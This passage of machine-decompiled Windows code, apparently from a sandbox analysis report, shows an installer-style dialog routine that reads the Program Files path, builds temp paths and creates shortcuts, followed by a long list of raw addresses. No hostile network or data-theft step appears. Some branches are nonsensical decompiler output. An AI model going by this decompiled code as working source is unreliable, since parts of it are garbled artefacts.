    									if(( *__edi & 0x0000ffff) != 0x2e) {
    										L54:
    										__eflags = __ax - __cx;
    										if(__ax == __cx) {
    											L66:
    											__ebp - 0x103c = E0083FAE7(__ebp - 0x103c, __edi, __esi);
    											__ebx = 0;
    											__eflags = 0;
    											L67:
    											_push(0x22);
    											_pop(__eax);
    											__eax = __ebp - 0x103c;
    											__eax = E00850D9B(__ebp - 0x103c, __ebp - 0x103c);
    											_pop(__ecx);
    											_pop(__ecx);
    											__eflags = __eax;
    											if(__eax != 0) {
    												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
    												if( *((intOrPtr*)(__eax + 2)) == __bx) {
    													__ecx = 0;
    													__eflags = 0;
    													 *__eax = __cx;
    												}
    											}
    											__eax = __ebp - 0x103c;
    											__edi = 0x879602;
    											E0083FAE7(0x879602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
    											__eax = E0084A06F(__ebp - 0x103c, __esi);
    											__esi = GetDlgItem( *(__ebp + 8), 0x66);
    											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
    											__ebx =  *0x86df7c;
    											__eax = SendMessageW(__esi, 0x143, __ebx, 0x879602); // executed
    											__eax = __ebp - 0x103c;
    											__eax = E00852BC9(__ebp - 0x103c, 0x879602, __eax);
    											_pop(__ecx);
    											_pop(__ecx);
    											__eflags = __eax;
    											if(__eax != 0) {
    												__ebp - 0x103c = 0;
    												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
    											}
    											goto L167;
    										}
    										__eflags = __ax;
    										if(__ax == 0) {
    											L57:
    											__eax = __ebp - 0x18;
    											__ebx = 0;
    											_push(__ebp - 0x18);
    											_push(1);
    											_push(0);
    											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
    											_push(0x80000002);
    											__eax =  *0x86dea8();
    											__eflags = __eax;
    											if(__eax == 0) {
    												__eax = __ebp - 0x14;
    												 *(__ebp - 0x14) = 0x1000;
    												_push(__ebp - 0x14);
    												__eax = __ebp - 0x103c;
    												_push(__ebp - 0x103c);
    												__eax = __ebp - 0x1c;
    												_push(__ebp - 0x1c);
    												_push(0);
    												_push(L"ProgramFilesDir");
    												_push( *(__ebp - 0x18));
    												__eax =  *0x86dea4();
    												_push( *(__ebp - 0x18));
    												 *0x86de84() =  *(__ebp - 0x14);
    												__ecx = 0x7ff;
    												__eax =  *(__ebp - 0x14) >> 1;
    												__eflags = __eax - 0x7ff;
    												if(__eax >= 0x7ff) {
    													__eax = 0x7ff;
    												}
    												__ecx = 0;
    												__eflags = 0;
    												 *(__ebp + __eax * 2 - 0x103c) = __cx;
    											}
    											__eflags =  *(__ebp - 0x103c) - __bx;
    											if( *(__ebp - 0x103c) != __bx) {
    												__eax = __ebp - 0x103c;
    												__eax = E00852B93(__ebp - 0x103c);
    												_push(0x5c);
    												_pop(__ecx);
    												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
    												if(__eflags != 0) {
    													__ebp - 0x103c = E0083FABF(__eflags, __ebp - 0x103c, 0x86258c, __esi);
    												}
    											}
    											__esi = E00852B93(__edi);
    											__eax = __ebp - 0x103c;
    											__eflags = __esi - 0x7ff;
    											__esi = 0x800;
    											if(__eflags < 0) {
    												__ebp - 0x103c = E0083FABF(__eflags, __ebp - 0x103c, __edi, 0x800);
    											}
    											goto L67;
    										}
    										__eflags =  *((short*)(__edi + 2)) - 0x3a;
    										if( *((short*)(__edi + 2)) == 0x3a) {
    											goto L66;
    										}
    										goto L57;
    									}
    									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
    									if( *((intOrPtr*)(__edi + 2)) != __cx) {
    										goto L54;
    									}
    									__edi = __edi + 4;
    									__ebx = 0;
    									__eflags =  *__edi - __bx;
    									if( *__edi == __bx) {
    										goto L167;
    									} else {
    										__ebp - 0x103c = E0083FAE7(__ebp - 0x103c, __edi, 0x800);
    										goto L67;
    									}
    								}
    							case 4:
    								__eflags =  *0x8795fc - 1;
    								__eflags = __eax - 0x8795fc;
    								 *__edi =  *__edi + __ecx;
    								__eflags =  *(__ebx + 6) & __bl;
    								 *__eax =  *__eax + __al;
    								__eflags =  *__eax;
    							case 5:
    								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
    								__ecx = 0;
    								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
    								__eflags = __eax;
    								if(__eax == 0) {
    									L84:
    									 *0x8775cf = __cl;
    									 *0x8775f0 = 1;
    									goto L167;
    								}
    								__eax = __eax - 0x30;
    								__eflags = __eax;
    								if(__eax == 0) {
    									 *0x8775cf = __cl;
    									L83:
    									 *0x8775f0 = __cl;
    									goto L167;
    								}
    								__eax = __eax - 1;
    								__eflags = __eax;
    								if(__eax == 0) {
    									goto L84;
    								}
    								__eax = __eax - 1;
    								__eflags = __eax;
    								if(__eax != 0) {
    									goto L167;
    								}
    								 *0x8775cf = 1;
    								goto L83;
    							case 6:
    								__eflags = __ebx - 4;
    								if(__ebx != 4) {
    									goto L94;
    								}
    								__eax = __ebp - 0x5c84;
    								__eax = E00852BC9(__ebp - 0x5c84, __eax, L"<>");
    								_pop(__ecx);
    								_pop(__ecx);
    								__eflags = __eax;
    								if(__eax == 0) {
    									goto L94;
    								}
    								_push(__edi);
    								goto L93;
    							case 7:
    								__eflags = __ebx - 1;
    								if(__eflags != 0) {
    									L115:
    									__eflags = __ebx - 7;
    									if(__ebx == 7) {
    										__eflags =  *0x8795fc;
    										if( *0x8795fc == 0) {
    											 *0x8795fc = 2;
    										}
    										 *0x8785f8 = 1;
    									}
    									goto L167;
    								}
    								__eax = __ebp - 0x7c84;
    								__edi = 0x800;
    								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
    								E0083AF49(__eflags, __ebp - 0x7c84, 0x800) = 0;
    								__esi = 0;
    								_push(0);
    								while(1) {
    									_push( *0x86d5f8);
    									__ebp - 0x7c84 = E00833F53(0x8785fa, __edi, L"%s%s%u", __ebp - 0x7c84);
    									__eax = E00839F0F(0x8785fa);
    									__eflags = __al;
    									if(__al == 0) {
    										break;
    									}
    									__esi =  &(__esi->i);
    									__eflags = __esi;
    									_push(__esi);
    								}
    								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x8785fa);
    								__eflags =  *(__ebp - 0x5c84);
    								if( *(__ebp - 0x5c84) == 0) {
    									goto L167;
    								}
    								__eflags =  *0x885d02;
    								if( *0x885d02 != 0) {
    									goto L167;
    								}
    								__eax = 0;
    								 *(__ebp - 0x143c) = __ax;
    								__eax = __ebp - 0x5c84;
    								_push(0x2c);
    								_push(__ebp - 0x5c84);
    								__eax = E00850BB8(__ecx);
    								_pop(__ecx);
    								_pop(__ecx);
    								__eflags = __eax;
    								if(__eax != 0) {
    									L111:
    									__eflags =  *(__ebp - 0x143c);
    									if( *(__ebp - 0x143c) == 0) {
    										__ebp - 0x1bc8c = __ebp - 0x5c84;
    										E0083FAE7(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
    										__ebp - 0x143c = E0083FAE7(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
    									}
    									__ebp - 0x5c84 = E00849CC2(__ebp - 0x5c84);
    									__eax = 0;
    									 *(__ebp - 0x4c84) = __ax;
    									__ebp - 0x143c = __ebp - 0x5c84;
    									__eax = E008497A8( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
    									__eflags = __eax - 6;
    									if(__eax == 6) {
    										goto L167;
    									} else {
    										__eax = 0;
    										__eflags = 0;
    										 *0x8775cc = 1;
    										 *0x8785fa = __ax;
    										__eax = EndDialog( *(__ebp + 8), 1);
    										goto L115;
    									}
    								}
    								__edx = 0;
    								__esi = 0;
    								__eflags =  *(__ebp - 0x5c84) - __dx;
    								if( *(__ebp - 0x5c84) == __dx) {
    									goto L111;
    								}
    								__ecx = 0;
    								__eax = __ebp - 0x5c84;
    								while(1) {
    									__eflags =  *__eax - 0x40;
    									if( *__eax == 0x40) {
    										break;
    									}
    									__esi =  &(__esi->i);
    									__eax = __ebp - 0x5c84;
    									__ecx = __esi + __esi;
    									__eax = __ebp - 0x5c84 + __ecx;
    									__eflags =  *__eax - __dx;
    									if( *__eax != __dx) {
    										continue;
    									}
    									goto L111;
    								}
    								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
    								__ebp - 0x143c = E0083FAE7(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
    								__eax = 0;
    								__eflags = 0;
    								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
    								goto L111;
    							case 8:
    								__eflags = __ebx - 3;
    								if(__ebx == 3) {
    									__eflags =  *(__ebp - 0x5c84) - __di;
    									if(__eflags != 0) {
    										__eax = __ebp - 0x5c84;
    										_push(__ebp - 0x5c84);
    										__eax = E00856702(__ebx, __edi);
    										_pop(__ecx);
    										 *0x88de1c = __eax;
    									}
    									__eax = __ebp + 0xc;
    									_push(__ebp + 0xc);
    									 *0x88de18 = E0084A321(__ecx, __edx, __eflags);
    								}
    								 *0x885d03 = 1;
    								goto L167;
    							case 9:
    								__eflags = __ebx - 5;
    								if(__ebx != 5) {
    									L94:
    									 *0x88de20 = 1;
    									goto L167;
    								}
    								_push(1);
    								L93:
    								__eax = __ebp - 0x5c84;
    								_push(__ebp - 0x5c84);
    								_push( *(__ebp + 8));
    								__eax = E0084C487();
    								goto L94;
    							case 0xa:
    								__eflags = __ebx - 6;
    								if(__ebx != 6) {
    									goto L167;
    								}
    								__eax = 0;
    								 *(__ebp - 0x2c3c) = __ax;
    								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
    								__eax = E00855A00( *(__ebp - 0x1bc8c) & 0x0000ffff);
    								_push(0x800);
    								__eflags = __eax - 0x50;
    								if(__eax == 0x50) {
    									_push(0x88ad0a);
    									__eax = __ebp - 0x2c3c;
    									_push(__ebp - 0x2c3c);
    									__eax = E0083FAE7();
    									 *(__ebp - 0x14) = 2;
    								} else {
    									__eflags = __eax - 0x54;
    									__eax = __ebp - 0x2c3c;
    									if(__eflags == 0) {
    										_push(0x889d0a);
    										_push(__eax);
    										__eax = E0083FAE7();
    										 *(__ebp - 0x14) = 7;
    									} else {
    										_push(0x88bd0a);
    										_push(__eax);
    										__eax = E0083FAE7();
    										 *(__ebp - 0x14) = 0x10;
    									}
    								}
    								__eax = 0;
    								 *(__ebp - 0x9c8c) = __ax;
    								 *(__ebp - 0x1c3c) = __ax;
    								__ebp - 0x19c8c = __ebp - 0x6c84;
    								__eax = E00854DC3(__ebp - 0x6c84, __ebp - 0x19c8c);
    								_pop(__ecx);
    								_pop(__ecx);
    								_push(0x22);
    								_pop(__ebx);
    								__eflags =  *(__ebp - 0x6c84) - __bx;
    								if( *(__ebp - 0x6c84) != __bx) {
    									__ebp - 0x6c84 = E00839F0F(__ebp - 0x6c84);
    									__eflags = __al;
    									if(__al != 0) {
    										goto L152;
    									}
    									__ebx = __edi;
    									__esi = __ebp - 0x6c84;
    									__eflags =  *(__ebp - 0x6c84) - __bx;
    									if( *(__ebp - 0x6c84) == __bx) {
    										goto L152;
    									}
    									_push(0x20);
    									_pop(__ecx);
    									do {
    										__eax = __esi->i & 0x0000ffff;
    										__eflags = __ax - __cx;
    										if(__ax == __cx) {
    											L140:
    											__edi = __eax;
    											__eax = 0;
    											__esi->i = __ax;
    											__ebp - 0x6c84 = E00839F0F(__ebp - 0x6c84);
    											__eflags = __al;
    											if(__al == 0) {
    												__esi->i = __di;
    												L148:
    												_push(0x20);
    												_pop(__ecx);
    												__edi = 0;
    												__eflags = 0;
    												goto L149;
    											}
    											_push(0x2f);
    											_pop(__eax);
    											__ebx = __esi;
    											__eflags = __di - __ax;
    											if(__di != __ax) {
    												_push(0x20);
    												_pop(__eax);
    												do {
    													__esi =  &(__esi->i);
    													__eflags = __esi->i - __ax;
    												} while (__esi->i == __ax);
    												_push(__esi);
    												__eax = __ebp - 0x1c3c;
    												L146:
    												_push(__eax);
    												__eax = E00854DC3();
    												_pop(__ecx);
    												_pop(__ecx);
    												 *__ebx = __di;
    												goto L148;
    											}
    											 *(__ebp - 0x1c3c) = __ax;
    											__eax =  &(__esi->i);
    											_push( &(__esi->i));
    											__eax = __ebp - 0x1c3a;
    											goto L146;
    										}
    										_push(0x2f);
    										_pop(__edx);
    										__eflags = __ax - __dx;
    										if(__ax != __dx) {
    											goto L149;
    										}
    										goto L140;
    										L149:
    										__esi =  &(__esi->i);
    										__eflags = __esi->i - __di;
    									} while (__esi->i != __di);
    									__eflags = __ebx;
    									if(__ebx != 0) {
    										__eax = 0;
    										__eflags = 0;
    										 *__ebx = __ax;
    									}
    									goto L152;
    								} else {
    									__ebp - 0x19c8a = __ebp - 0x6c84;
    									E00854DC3(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
    									_push(__ebx);
    									_push(__ebp - 0x6c82);
    									__eax = E00850BB8(__ecx);
    									__esp = __esp + 0x10;
    									__eflags = __eax;
    									if(__eax != 0) {
    										__ecx = 0;
    										 *__eax = __cx;
    										__ebp - 0x1c3c = E00854DC3(__ebp - 0x1c3c, __ebp - 0x1c3c);
    										_pop(__ecx);
    										_pop(__ecx);
    									}
    									L152:
    									__eflags =  *(__ebp - 0x11c8c);
    									__ebx = 0x800;
    									if( *(__ebp - 0x11c8c) != 0) {
    										_push(0x800);
    										__eax = __ebp - 0x9c8c;
    										_push(__ebp - 0x9c8c);
    										__eax = __ebp - 0x11c8c;
    										_push(__ebp - 0x11c8c);
    										__eax = E0083AF74();
    									}
    									_push(__ebx);
    									__eax = __ebp - 0xbc8c;
    									_push(__ebp - 0xbc8c);
    									__eax = __ebp - 0x6c84;
    									_push(__ebp - 0x6c84);
    									__eax = E0083AF74();
    									__eflags =  *(__ebp - 0x2c3c);
    									if(__eflags == 0) {
    										__ebp - 0x2c3c = E0084A2C1(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
    									}
    									__ebp - 0x2c3c = E0083AF49(__eflags, __ebp - 0x2c3c, __ebx);
    									__eflags =  *((short*)(__ebp - 0x17c8c));
    									if(__eflags != 0) {
    										__ebp - 0x17c8c = __ebp - 0x2c3c;
    										E0083FABF(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
    										__eax = E0083AF49(__eflags, __ebp - 0x2c3c, __ebx);
    									}
    									__ebp - 0x2c3c = __ebp - 0xcc8c;
    									__eax = E00854DC3(__ebp - 0xcc8c, __ebp - 0x2c3c);
    									__eflags =  *(__ebp - 0x13c8c);
    									__eax = __ebp - 0x13c8c;
    									_pop(__ecx);
    									_pop(__ecx);
    									if(__eflags == 0) {
    										__eax = __ebp - 0x19c8c;
    									}
    									__ebp - 0x2c3c = E0083FABF(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
    									__eax = __ebp - 0x2c3c;
    									__eflags = E0083B1F0(__ebp - 0x2c3c);
    									if(__eflags == 0) {
    										L162:
    										__ebp - 0x2c3c = E0083FABF(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
    										goto L163;
    									} else {
    										__eflags = __eax;
    										if(__eflags == 0) {
    											L163:
    											_push(1);
    											__eax = __ebp - 0x2c3c;
    											_push(__ebp - 0x2c3c);
    											E00839DDE(__ecx, __ebp) = __ebp - 0xbc8c;
    											__ebp - 0xac8c = E00854DC3(__ebp - 0xac8c, __ebp - 0xbc8c);
    											_pop(__ecx);
    											_pop(__ecx);
    											__ebp - 0xac8c = E0083BA2A(__eflags, __ebp - 0xac8c);
    											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
    											__eax = __ebp - 0x1c3c;
    											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
    											__edx = __ebp - 0x9c8c;
    											__esi = __ebp - 0xac8c;
    											asm("sbb ecx, ecx");
    											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
    											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
    											asm("sbb eax, eax");
    											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
    											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
    											__eax = __ebp - 0x15c8c;
    											asm("sbb edx, edx");
    											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
    											E00849DB4(__ebp - 0x15c8c) = __ebp - 0x2c3c;
    											__ebp - 0xbc8c = E008494C3(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
    											__eflags =  *(__ebp - 0xcc8c);
    											if( *(__ebp - 0xcc8c) != 0) {
    												_push(__edi);
    												__eax = __ebp - 0xcc8c;
    												_push(__ebp - 0xcc8c);
    												_push(5);
    												_push(0x1000);
    												__eax =  *0x86def8();
    											}
    											goto L167;
    										}
    										goto L162;
    									}
    								}
    							case 0xb:
    								__eflags = __ebx - 7;
    								if(__ebx == 7) {
    									 *0x879600 = 1;
    								}
    								goto L167;
    							case 0xc:
    								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
    								__eax = E00855A00( *(__ebp - 0x5c84) & 0x0000ffff);
    								__eflags = __eax - 0x46;
    								if(__eax == 0x46) {
    									 *0x8775f1 = 1;
    								} else {
    									__eflags = __eax - 0x55;
    									if(__eax == 0x55) {
    										 *0x8775f2 = 1;
    									} else {
    										__eax = 0;
    										 *0x8775f1 = __al;
    										 *0x8775f2 = __al;
    									}
    								}
    								goto L167;
    							case 0xd:
    								 *0x88de21 = 1;
    								__eax = __eax + 0x88de21;
    								_t112 = __esi + 0x39;
    								 *_t112 =  *(__esi + 0x39) + __esp;
    								__eflags =  *_t112;
    								__ebp = 0xffffa37c;
    								if( *_t112 != 0) {
    									_t114 = __ebp - 0x5c84; // 0xffff46f8
    									__eax = _t114;
    									_push(_t114);
    									 *0x86d5fc = E00841424();
    								}
    								goto L167;
    						}
    						L4:
    						_t220 = E00849E97(_t220, _t297);
    						_t297 = _t297 + 0x2000;
    						_t294 = _t294 - 1;
    						if(_t294 != 0) {
    							goto L4;
    						} else {
    							_t298 = _t294;
    							goto L6;
    						}
    						L167:
    						_push(0x1000);
    						_t205 = _t303 - 0xe; // 0xffffa36e
    						_t206 = _t303 - 0xd; // 0xffffa36f
    						_t207 = _t303 - 0x5c84; // 0xffff46f8
    						_t208 = _t303 - 0xfc8c; // 0xfffea6f0
    						_push( *((intOrPtr*)(_t303 + 0xc)));
    						_t215 = E0084A1C9();
    						_t278 =  *((intOrPtr*)(_t303 + 0x10));
    						 *((intOrPtr*)(_t303 + 0xc)) = _t215;
    					} while (_t215 != 0);
    				}
    			}











    0x0084b522
    0x0084b527
    0x0084b52c
    0x0084b531
    0x0084b53a
    0x0084c122
    0x0084c125
    0x0084c12f
    0x0084c12f
    0x0084b540
    0x0084b548
    0x0084b54c
    0x0084b553
    0x0084b55a
    0x0084b55b
    0x0084b55e
    0x0084b565
    0x0084b56a
    0x0084b571
    0x0084b576
    0x0084b578
    0x0084b57e
    0x0084b584
    0x0084b584
    0x00000000
    0x0084b599
    0x0084b5b0
    0x0084b5b4
    0x00000000
    0x0084b5b6
    0x00000000
    0x0084b5b6
    0x0084b5b4
    0x0084b5be
    0x00000000
    0x00000000
    0x0084b5c4
    0x00000000
    0x0084b5cb
    0x0084b5ce
    0x00000000
    0x00000000
    0x0084b5d4
    0x0084b5e1
    0x0084b607
    0x0084b612
    0x0084b61c
    0x0084b627
    0x0084b62c
    0x0084b634
    0x0084b63a
    0x0084b63f
    0x0084b641
    0x0084b7a6
    0x0084b7a6
    0x0084b7b0
    0x00000000
    0x0084b647
    0x0084b64d
    0x0084b66f
    0x0084b67e
    0x0084b68b
    0x0084b69c
    0x0084b69f
    0x0084b6a2
    0x0084b6b5
    0x0084b6bc
    0x0084b6c1
    0x0084b6c3
    0x00000000
    0x00000000
    0x0084b6c9
    0x0084b6d0
    0x0084b6d5
    0x0084b6da
    0x0084b6e6
    0x0084b6eb
    0x0084b6ee
    0x0084b6f5
    0x0084b6f7
    0x0084b6f8
    0x0084b702
    0x0084b708
    0x0084b709
    0x00000000
    0x0084b709
    0x0084b6ab
    0x0084b6b1
    0x0084b6b3
    0x00000000
    0x00000000
    0x00000000
    0x0084b70f
    0x0084b716
    0x0084b718
    0x0084b71b
    0x0084b78b
    0x0084b78b
    0x0084b793
    0x0084b799
    0x0084b79e
    0x0084b7a0
    0x0084b64f
    0x0084b654
    0x0084b65c
    0x0084b662
    0x0084b669
    0x00000000
    0x00000000
    0x00000000
    0x0084b669
    0x00000000
    0x0084b7a0
    0x0084b724
    0x0084b72a
    0x0084b72c
    0x00000000
    0x0084b72e
    0x0084b72e
    0x0084b730
    0x0084b731
    0x0084b735
    0x0084b74d
    0x0084b752
    0x0084b75c
    0x0084b75e
    0x0084b761
    0x0084b733
    0x0084b733
    0x0084b734
    0x00000000
    0x0084b763
    0x0084b771
    0x0084b777
    0x0084b779
    0x0084b785
    0x0084b785
    0x00000000
    0x0084b779
    0x0084b761
    0x0084b72c
    0x00000000
    0x0084b7ba
    0x0084b7bc
    0x0084b80f
    0x0084b814
    0x0084b81d
    0x0084b81e
    0x0084b824
    0x0084b829
    0x0084b82c
    0x0084b82e
    0x0084b830
    0x0084b835
    0x0084b837
    0x0084b839
    0x0084b839
    0x0084b83b
    0x0084b83b
    0x0084b840
    0x0084b845
    0x0084b846
    0x0084b846
    0x0084b847
    0x0084b849
    0x0084b850
    0x0084b855
    0x0084b849
    0x00000000
    0x00000000
    0x0084b85b
    0x0084b85d
    0x0084b86d
    0x0084b86d
    0x00000000
    0x00000000
    0x0084b878
    0x0084b87a
    0x00000000
    0x00000000
    0x0084b880
    0x0084b887
    0x00000000
    0x00000000
    0x0084b88d
    0x0084b88f
    0x0084b895
    0x0084b897
    0x0084b89e
    0x0084b89f
    0x0084b8a6
    0x0084b8a8
    0x0084b8a8
    0x0084b8af
    0x0084b8b4
    0x0084b8ba
    0x0084b8bc
    0x00000000
    0x0084b8c2
    0x0084b8c2
    0x0084b8c5
    0x0084b8c7
    0x0084b8c8
    0x0084b8cb
    0x0084b8f4
    0x0084b8f4
    0x0084b8f7
    0x0084b9dc
    0x0084b9e5
    0x0084b9ea
    0x0084b9ea
    0x0084b9ec
    0x0084b9ec
    0x0084b9ee
    0x0084b9f0
    0x0084b9f7
    0x0084b9fc
    0x0084b9fd
    0x0084b9fe
    0x0084ba00
    0x0084ba02
    0x0084ba06
    0x0084ba08
    0x0084ba08
    0x0084ba0a
    0x0084ba0a
    0x0084ba06
    0x0084ba0e
    0x0084ba14
    0x0084ba21
    0x0084ba28
    0x0084ba38
    0x0084ba42
    0x0084ba4a
    0x0084ba56
    0x0084ba58
    0x0084ba60
    0x0084ba65
    0x0084ba66
    0x0084ba67
    0x0084ba69
    0x0084ba76
    0x0084ba7f
    0x0084ba7f
    0x00000000
    0x0084ba69
    0x0084b8fd
    0x0084b900
    0x0084b90d
    0x0084b90d
    0x0084b910
    0x0084b912
    0x0084b913
    0x0084b915
    0x0084b916
    0x0084b91b
    0x0084b920
    0x0084b926
    0x0084b928
    0x0084b92a
    0x0084b92d
    0x0084b934
    0x0084b935
    0x0084b93b
    0x0084b93c
    0x0084b93f
    0x0084b940
    0x0084b941
    0x0084b946
    0x0084b949
    0x0084b94f
    0x0084b958
    0x0084b95b
    0x0084b960
    0x0084b962
    0x0084b964
    0x0084b966
    0x0084b966
    0x0084b968
    0x0084b968
    0x0084b96a
    0x0084b96a
    0x0084b972
    0x0084b979
    0x0084b97b
    0x0084b982
    0x0084b988
    0x0084b98a
    0x0084b98b
    0x0084b993
    0x0084b9a2
    0x0084b9a2
    0x0084b993
    0x0084b9ad
    0x0084b9af
    0x0084b9be
    0x0084b9c4
    0x0084b9ca
    0x0084b9d5
    0x0084b9d5
    0x00000000
    0x0084b9ca
    0x0084b902
    0x0084b907
    0x00000000
    0x00000000
    0x00000000
    0x0084b907
    0x0084b8cd
    0x0084b8d1
    0x00000000
    0x00000000
    0x0084b8d3
    0x0084b8d6
    0x0084b8d8
    0x0084b8db
    0x00000000
    0x0084b8e1
    0x0084b8ea
    0x00000000
    0x0084b8ea
    0x0084b8db
    0x00000000
    0x0084ba86
    0x0084ba87
    0x0084ba8c
    0x0084ba8e
    0x0084ba91
    0x0084ba91
    0x00000000
    0x0084bac7
    0x0084bace
    0x0084bad0
    0x0084bad0
    0x0084bad2
    0x0084bb01
    0x0084bb01
    0x0084bb07
    0x00000000
    0x0084bb07
    0x0084bad4
    0x0084bad4
    0x0084bad7
    0x0084baf0
    0x0084baf6
    0x0084baf6
    0x00000000
    0x0084baf6
    0x0084bad9
    0x0084bad9
    0x0084badc
    0x00000000
    0x00000000
    0x0084bade
    0x0084bade
    0x0084bae1
    0x00000000
    0x00000000
    0x0084bae7
    0x00000000
    0x00000000
    0x0084bb54
    0x0084bb57
    0x00000000
    0x00000000
    0x0084bb59
    0x0084bb65
    0x0084bb6a
    0x0084bb6b
    0x0084bb6c
    0x0084bb6e
    0x00000000
    0x00000000
    0x0084bb70
    0x00000000
    0x00000000
    0x0084bbb6
    0x0084bbb9
    0x0084bd3a
    0x0084bd3a
    0x0084bd3d
    0x0084bd43
    0x0084bd4a
    0x0084bd4c
    0x0084bd4c
    0x0084bd56
    0x0084bd56
    0x00000000
    0x0084bd3d
    0x0084bbbf
    0x0084bbc5
    0x0084bbd3
    0x0084bbdf
    0x0084bbe1
    0x0084bbe3
    0x0084bbe8
    0x0084bbe8
    0x0084bc00
    0x0084bc0d
    0x0084bc12
    0x0084bc14
    0x00000000
    0x00000000
    0x0084bbe6
    0x0084bbe6
    0x0084bbe7
    0x0084bbe7
    0x0084bc20
    0x0084bc26
    0x0084bc2e
    0x00000000
    0x00000000
    0x0084bc34
    0x0084bc3b
    0x00000000
    0x00000000
    0x0084bc41
    0x0084bc43
    0x0084bc4a
    0x0084bc50
    0x0084bc52
    0x0084bc53
    0x0084bc58
    0x0084bc59
    0x0084bc5a
    0x0084bc5c
    0x0084bcb0
    0x0084bcb0
    0x0084bcb8
    0x0084bcc6
    0x0084bcd7
    0x0084bce5
    0x0084bce5
    0x0084bcf1
    0x0084bcf6
    0x0084bcf8
    0x0084bd08
    0x0084bd12
    0x0084bd17
    0x0084bd1a
    0x00000000
    0x0084bd20
    0x0084bd25
    0x0084bd25
    0x0084bd27
    0x0084bd2e
    0x0084bd34
    0x00000000
    0x0084bd34
    0x0084bd1a
    0x0084bc5e
    0x0084bc60
    0x0084bc62
    0x0084bc69
    0x00000000
    0x00000000
    0x0084bc6b
    0x0084bc6d
    0x0084bc73
    0x0084bc73
    0x0084bc77
    0x00000000
    0x00000000
    0x0084bc79
    0x0084bc7a
    0x0084bc80
    0x0084bc83
    0x0084bc85
    0x0084bc88
    0x00000000
    0x00000000
    0x00000000
    0x0084bc8a
    0x0084bc97
    0x0084bca1
    0x0084bca6
    0x0084bca6
    0x0084bca8
    0x00000000
    0x00000000
    0x0084bd62
    0x0084bd65
    0x0084bd67
    0x0084bd6e
    0x0084bd70
    0x0084bd76
    0x0084bd77
    0x0084bd7c
    0x0084bd7d
    0x0084bd7d
    0x0084bd82
    0x0084bd85
    0x0084bd8b
    0x0084bd8b
    0x0084bd90
    0x00000000
    0x00000000
    0x0084bd9c
    0x0084bd9f
    0x0084bb80
    0x0084bb80
    0x00000000
    0x0084bb80
    0x0084bda5
    0x0084bb71
    0x0084bb71
    0x0084bb77
    0x0084bb78
    0x0084bb7b
    0x00000000
    0x00000000
    0x0084bdac
    0x0084bdaf
    0x00000000
    0x00000000
    0x0084bdb5
    0x0084bdb7
    0x0084bdbe
    0x0084bdc6
    0x0084bdcc
    0x0084bdd1
    0x0084bdd4
    0x0084be09
    0x0084be0e
    0x0084be14
    0x0084be15
    0x0084be1a
    0x0084bdd6
    0x0084bdd6
    0x0084bdd9
    0x0084bddf
    0x0084bdf5
    0x0084bdfa
    0x0084bdfb
    0x0084be00
    0x0084bde1
    0x0084bde1
    0x0084bde6
    0x0084bde7
    0x0084bdec
    0x0084bdec
    0x0084bddf
    0x0084be21
    0x0084be23
    0x0084be2a
    0x0084be38
    0x0084be3f
    0x0084be44
    0x0084be45
    0x0084be46
    0x0084be48
    0x0084be49
    0x0084be50
    0x0084bea0
    0x0084bea5
    0x0084bea7
    0x00000000
    0x00000000
    0x0084bead
    0x0084beaf
    0x0084beb5
    0x0084bebc
    0x00000000
    0x00000000
    0x0084bebe
    0x0084bec0
    0x0084bec1
    0x0084bec1
    0x0084bec4
    0x0084bec7
    0x0084bed1
    0x0084bed1
    0x0084bed3
    0x0084bed5
    0x0084bedf
    0x0084bee4
    0x0084bee6
    0x0084bf24
    0x0084bf27
    0x0084bf27
    0x0084bf29
    0x0084bf2a
    0x0084bf2a
    0x00000000
    0x0084bf2a
    0x0084bee8
    0x0084beea
    0x0084beeb
    0x0084beed
    0x0084bef0
    0x0084bf05
    0x0084bf07
    0x0084bf08
    0x0084bf08
    0x0084bf0b
    0x0084bf0b
    0x0084bf10
    0x0084bf11
    0x0084bf17
    0x0084bf17
    0x0084bf18
    0x0084bf1d
    0x0084bf1e
    0x0084bf1f
    0x00000000
    0x0084bf1f
    0x0084bef2
    0x0084bef9
    0x0084befc
    0x0084befd
    0x00000000
    0x0084befd
    0x0084bec9
    0x0084becb
    0x0084becc
